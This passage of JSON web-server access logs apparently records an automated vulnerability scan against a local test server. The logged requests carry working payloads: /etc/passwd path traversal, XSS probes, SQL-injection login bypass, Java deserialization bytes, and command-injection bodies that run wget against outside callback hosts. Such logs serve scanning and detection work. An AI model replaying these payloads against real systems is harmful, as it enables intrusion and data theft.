+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sphider/admin/admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"username=YWRtaW4=&password=YWRtaW4xMjM=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service/rapture/session HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/mobile.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search/admin/admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/firewall.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.198","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@c9v8hn0smpv8c57g0t001tzcoaeqrbt4p.oast.live", "http_referer":"http://c9v8hn0smpv8c57g0t00fmf3rkge7arbn.oast.live/ref", "request_method":"GET", "http_x_forwarded_for":"spoofed.c9v8hn0smpv8c57g0t001s6y6cmnzbgwt.oast.live"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /account/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/external/7.0/system.System.get_infos HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /opensis/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cxcum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.203","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /solr/admin/cores?wt=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://c9v8hs0smpv8c6ag07h0nom54espehdb6.oast.online`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi? HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simple-ajax-chat/sac-export.csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"\xAC\xED\x00\x05sr\x00\x13java.util.ArrayListx\x81\xD2\x1D\x99\xC7a\x9D\x03\x00\x01I\x00\x04sizexp\x00\x00\x00\x02w\x04\x00\x00\x00\x02t\x00\x09element 1t\x00\x09element 2x","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /invoker/EJBInvokerServlet/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.218","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-----------------------------77916619616724262872902741074\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x22297MbHUx9E3n5eLweXRKbcnwXXp.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0ATest\x0D\x0A-----------------------------77916619616724262872902741074--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:20 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/getuser?index=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer/send_email?to=YiMy@Ovmi&url=http://c9v8hn0smpv8c57g0t00soo8e1jxw74ha.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.220","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fc9v8hs0smpv8c6ag07h0ifw78rsrd3hry.oast.online%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.206","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_page.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/script/common.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/wdisp/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wabam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:21 